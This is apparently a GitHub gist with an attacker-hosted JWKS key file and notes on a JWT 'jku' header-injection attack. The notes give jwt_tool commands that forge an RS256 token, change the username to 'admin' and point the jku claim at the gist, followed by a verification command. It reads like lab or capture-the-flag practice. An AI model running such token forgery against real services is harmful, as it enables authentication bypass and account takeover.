@kawing-ho
Last active July 25, 2021 12:36
{"keys":[{"e":"AQAB","kid":"jwt_tool","kty":"RSA","n":"kAxsJGZwBGq2i6nOw1bCIrg7JfGQch4InP4FyFJFexEvc5LeiPB5jRk0YEanlnoNdKdsqMdg2hMGOUBKOCYycWdwd3pXUDB-qTV7v2qzO586QA3F4G912ieLfD_2jdl9PGAl7RwK9YemQTly-x4d3eC4Qh7MzdSWl3VrNQ-WFWbkYGg2oIzACLPTX_-Ko9zdzDT3WhD_Zpub5q1jpwRw72KnHdQmLNS5M-12-Yz1VEhylcGCOu6MO2bYKco233SyGu9-g2Wkr-zDut6RA4UEVfwd70x316c85xxd2f4WLun_wW01akWf051kePX7uZq9VoF5WoXK4CSF7ZqoARebiQ","use":"sig"}]}

kawing-ho commented Jul 25, 2021

https://github.com/ticarpi/jwt_tool/wiki/Using-jwt_tool#common-attacks

jwt_tool will automatically generate public/private key pairs as well as the corresponding JWKS file.

This file is hosted here, and its URL will then be passed into the jku header claim.


In the meantime, the forged token should

  • Be tampered to change payload
  • Be signed with RS256 with the jwttool_custom_private_RSA.pem file
  • Alternatively, you can point straight to an already hosted JWKS (as long as it matches the jwttool_custom_jwks.json file)
python3 jwt_tool.py "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImprdSI6Imh0dHA6Ly9sb2NhbGhvc3QvLndlbGwta25vd24vandrcy5qc29uIiwia2lkIjoiNDJhMTg0YWEtODkzZC00MTQzLTlmOWEtNDg0YTgyMTIwN2ZiIn0.eyJ1c2VybmFtZSI6ImFkbW9uIiwiaWF0IjoxNjI3MjEwODI3LCJleHAiOjE2MjcyMzI0Mjd9.SEsjuMb53f9UqQaOdAIYGPyK2VylCWVuGduPoW_Y0eNOp9M4sHvaTiQzQ-WRpziEAjU-ZaS0J74MPsP9B_1PHqSqInE_Z4DiQ0UhbF8r1KzjROScxl6B3EsKoCmdlIUinc1lANrwKm53dD7aE_Z7d0Vszjfhs9xYd5MP1wk6miQFIevqwyWZr1VT7iqGAHuCCTPty5L0yddVe_2OKtbpyPe7HcIZiYHeX80HMos-sn4GAGjkACGX8Zq04fn7kwfWKEPnl5N72_1WctfXIIWGS6KQuk-bcaZ04SrYu0IXm-K_QqFCwLM8c2KnQrF7vfDIBo7QFafkTB-cIhi8zGN9TA" -X s -ju "https://gist.githubusercontent.com/kawing-ho/8aae9797973b4401745e43296ce1b325/raw/7f2fc53e6f89e8e0113aee390efe46fc43c43476/jwks.json" -T

In interactive mode, make sure to:

  • Update the jku
  • Update the kid
  • Update the payload (in this case username)

To verify:

python3 jwt_tool.py "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiIsImprdSI6Imh0dHBzOi8vZ2lzdC5naXRodWJ1c2VyY29udGVudC5jb20va2F3aW5nLWhvLzhhYWU5Nzk3OTczYjQ0MDE3NDVlNDMyOTZjZTFiMzI1L3Jhdy83ZjJmYzUzZTZmODllOGUwMTEzYWVlMzkwZWZlNDZmYzQzYzQzNDc2L2p3a3MuanNvbiIsImtpZCI6Imp3dF90b29sIn0.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNjI3MjEwODI3LCJleHAiOjE2MjcyMzI0Mjd9.fkteMIOk0BgLjXSVfhVcz8YPF4M_8YVei8bkOwingpiDB4UXOlIxVRTtQO-YSGfvhMcnrikdoziORDUeEBldRRU3T5DJAcga9rMwO2FkD9m1-5Dkj2jYIOLjQODTvjQCwozlZxYd24vYhiEJ6GFZ4vBnsJa9lwx6VQzNx5a8lUBgq3DYoUBk9J6LepKeDIS33ohfWFboS5PZMtm0vqyNymOkFfNpf2yxQ1yYMc9MlAcrqPf3m5b150H4T1fLxytPaGME5HfYOsaKp5vgQSPYFJZY05Q5-pykkbkDhMoyBi1INi33xF4qqNdkbvdaKbHT--WXzcLqLIq69grLL4vReA" -V -jw "jwttool_custom_jwks.json"
